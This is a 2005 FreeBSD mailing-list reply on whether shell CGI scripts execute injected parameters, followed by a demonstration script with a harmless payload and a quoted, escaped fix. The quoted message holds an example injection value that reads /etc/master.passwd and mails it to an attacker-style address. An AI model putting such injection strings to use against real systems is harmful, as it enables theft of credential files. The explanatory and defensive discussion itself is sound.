Date: Fri, 4 Feb 2005 22:13:45 -0600
From: Dan Nelson <dnelson@allantgroup.com>
To: "Loren M. Lang" <lorenl@alzatex.com>
Cc: freebsd-questions@freebsd.org
Subject: Re: perl and ports
Message-ID: <20050205041344.GK25463@dan.emsphone.com>
In-Reply-To: <20050205034440.GF8619@alzatex.com>
References: <ef60af090501242128e57e92d@mail.gmail.com> <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <ef60af0905012500265eb38b66@mail.gmail.com> <EB3282A396FFCC78382D2E81@utd49554.utdallas.edu> <ef60af090501251100472d6fb6@mail.gmail.com> <20050125194736.GD76109@xor.obsecurity.org> <ef60af09050125142353301be4@mail.gmail.com> <ef60af09050125144166ecaae4@mail.gmail.com> <20050205034440.GF8619@alzatex.com>
In the last episode (Feb 04), Loren M. Lang said:
> Actually, I think you should work on sh first, it's a much bigger
> security hazard than perl. If you've ever written much sh, you'd
> realize that with its much looser syntax, it's easy to get into trouble.
> At least perl provides use strict and -Tw. Someone using sh to write
> cgi scripts is the worst. Imagine someone writing something like the
> following for a sh cgi script, where $USERNAME is a cgi parameter passed
> into the following script:
>
> echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
>
> What if someone wrote the following username and apache was running as
> root:
>
> charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo

Then you would get a web page containing:

<HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD>

The shell doesn't re-interpret its input unless explicitly told to via the
"eval" command. /bin/sh is a little limited for more complex scripts due to
its lack of arrays, though, so zsh/ksh/bash are much better choices :)

-- 
	Dan Nelson
	dnelson@allantgroup.com
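The exchange above can be checked directly. The script below is an added example, not code from either poster: it reproduces the quoted echo line as written, puts the same line through eval so the difference Dan describes is observable, and then goes one step further than the thread by showing what the unquoted expansion does allow (word splitting and globbing of the parameter) and a quoted, HTML-escaped form that does neither. The function names (welcome_plain, welcome_eval, welcome_safe, html_escape, payload_executed, glob_leaks_filename), the PAYLOAD variable and the temporary directory are all assumptions made for the demonstration; the payload is the thread's username with the "cat /etc/master.passwd | mail ..." part replaced by a harmless "echo PWNED" marker so the script is safe to run.

```shell
#!/bin/sh
# Added example, not part of the original thread. Does a CGI parameter that
# is merely *expanded* into an echo line get executed by the shell?
# Constructed hostile value, based on the thread's example, with the mail
# command replaced by a marker line we can look for in the output.
PAYLOAD='charlie; echo PWNED; echo'

# The quoted CGI line verbatim: $USERNAME is expanded once, then word-split
# and globbed because it is unquoted, but never re-parsed as commands.
welcome_plain() {
    USERNAME=$1
    echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
}

# The same line wrapped in eval: now the expanded text IS re-parsed, so the
# ';' in the parameter terminates the echo and the remainder runs as commands.
welcome_eval() {
    USERNAME=$1
    eval "echo \"<HTML><HEAD><TITLE>Welcome, \" $USERNAME \"</TITLE></HEAD>\""
}

# Hardened form: quote the expansion (no splitting, no globbing) and
# HTML-escape it so the value cannot close the <TITLE> element either.
html_escape() {
    printf '%s' "$1" | sed 's/&/\&amp;/g; s/</\&lt;/g; s/>/\&gt;/g; s/"/\&quot;/g'
}
welcome_safe() {
    USERNAME=$(html_escape "$1")
    echo "<HTML><HEAD><TITLE>Welcome, $USERNAME</TITLE></HEAD>"
}

# Returns 0 if running the named function on PAYLOAD produced a line that is
# exactly "PWNED", i.e. the injected command was actually executed.
payload_executed() {
    "$1" "$PAYLOAD" | grep -qx 'PWNED'
}

# Unquoted $USERNAME is still globbed: in a directory containing secret.txt,
# a username of '*' leaks that file name into the page. Returns 0 if it did.
glob_leaks_filename() {
    dir=$(mktemp -d) || return 2
    : > "$dir/secret.txt"
    result=1
    if ( cd "$dir" && "$1" '*' | grep -q 'secret.txt' ); then result=0; fi
    rm -rf "$dir"
    return $result
}

# Summary table when the script is run directly.
demo() {
    for fn in welcome_plain welcome_eval welcome_safe; do
        if payload_executed "$fn"; then verdict='injected command RAN'
        else verdict='payload stayed inert'; fi
        if glob_leaks_filename "$fn"; then glob='username globbed'
        else glob='username not globbed'; fi
        printf '%-14s %s, %s\n' "$fn:" "$verdict" "$glob"
    done
    return 0
}
demo
```

welcome_plain confirms Dan's point: the ';' and the command after it come out as literal text in the title, and only welcome_eval runs them. The two things the unquoted expansion does hand the caller are word splitting and pathname globbing, which glob_leaks_filename shows; quoting "$USERNAME" removes both, and the sed escape keeps the value from breaking out of the HTML it is printed into.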